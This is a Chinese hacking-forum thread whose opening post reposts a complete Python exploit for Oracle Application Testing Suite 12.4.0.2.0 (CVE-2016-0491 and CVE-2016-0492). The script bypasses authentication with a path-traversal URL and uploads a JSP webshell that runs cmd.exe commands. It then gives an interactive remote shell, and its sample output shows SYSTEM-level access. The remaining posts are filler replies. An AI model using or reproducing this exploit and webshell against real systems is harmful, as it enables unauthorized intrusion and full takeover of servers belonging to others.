请选择 进入手机版 | 继续访问电脑版
查看: 8189|回复: 2884

[Other] Oracle应用套件12.4.0.2.0任意文件上传漏洞

[复制链接]
  • TA的每日心情

    5 天前
  • 签到天数: 903 天

    [LV.10]以坛为家III

    发表于 2016-4-14 09:19:53 | 显示全部楼层 |阅读模式
    CVE: 2016-0491
    CVE: 2016-0492

    [Java] 纯文本查看 复制代码
    # Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
    # Exploit Author: Zhou Yu <[email]504137480@qq.com[/email] >
    # Vendor Homepage: [url]http://www.oracle.com/[/url]
    # Software Link: [url]http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn[/url]
    # Version: 12.4.0.2.0
    # Tested on: Win7 SP1 32-bit
    # CVE : CVE-2016-0492 and CVE-2016-0491
      
    import urllib2
    import urllib
      
    ip = '192.168.150.239'
    port = 8088
      
    url = "http://" + ip + ":" + str(port)
    #bypass authentication
    url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
    request = urllib2.Request(url)
      
    webshell_content='''
    <%@ page import="java.util.*,java.io.*"  %>
        <%
            if (request.getParameter("{cmd}") != null) {{
                Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
                OutputStream os = p.getOutputStream();
                InputStream in = p.getInputStream();
                DataInputStream dis = new DataInputStream(in);
                String disr = dis.readLine();
                while (disr != null) {{
                    out.println(disr);
                    disr = dis.readLine();
                }}
            }}
        %>
    '''
    boundary = "---------------------------7e01e2240a1e"
    request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
    post_data = "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
    post_data = post_data + "\r\n.jsp\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
    post_data = post_data + "\r\nwebshell.jsp\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
    post_data = post_data + "\r\n\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
    post_data = post_data + "\r\n\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
    post_data = post_data + "\r\n\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
    post_data = post_data + "\r\n*\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
    post_data = post_data + "Content-Type: text/plain\r\n"
    post_data = post_data + "\r\n" + webshell_content +"\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
    post_data = post_data + "\r\nDefault\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
    post_data = post_data + "\r\n.\r\n"
    post_data = post_data + "--" + boundary + "\r\n"
    post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
    post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
    post_data = post_data + "--" + boundary + "--"+"\r\n"
      
    try:
        request.add_data(post_data)
        response = urllib2.urlopen(request)
        if response.code == 200 :
            print "[+]upload done!"
            webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
            print "[+]wait a moment,detecting whether the webshell exists..."
            if urllib2.urlopen(webshellurl).code == 200 :
                print "[+]upload webshell successfully!"
                print "[+]return a cmd shell"
                while True:
                    cmd = raw_input(">>: ")
                    if cmd == "exit" :
                        break
                    print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
            else:
                print "[-]attack fail!"
        else:
            print "[-]attack fail!"
    except Exception as e:
        print "[-]attack fail!"
      
    '''
    #run the exploit and get a cmd shell
    root@kali:~/Desktop# python exploit.py 
    [+]upload done!
    [+]wait a moment,detecting whether the webshell exists...
    [+]upload webshell successfully!
    [+]return a cmd shell
    >>: whoami
    nt authority\system
      
      
    >>: exit
    '''
    回复

    使用道具 举报

    该用户从未签到

    发表于 2016-4-14 10:26:34 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-14 10:58:02 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-14 11:36:57 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-1-11 17:10
  • 签到天数: 124 天

    [LV.7]常住居民III

    发表于 2016-4-14 12:35:09 | 显示全部楼层
    没有详细图片吗
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-14 13:11:33 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2016-4-14 14:12:12 | 显示全部楼层
    谢谢楼主的分享
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-14 14:21:03 | 显示全部楼层
    我是来水经验的……
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2016-4-14 15:17:09 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-4-14 16:13:24 | 显示全部楼层
    支持,看起来还是可以的
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表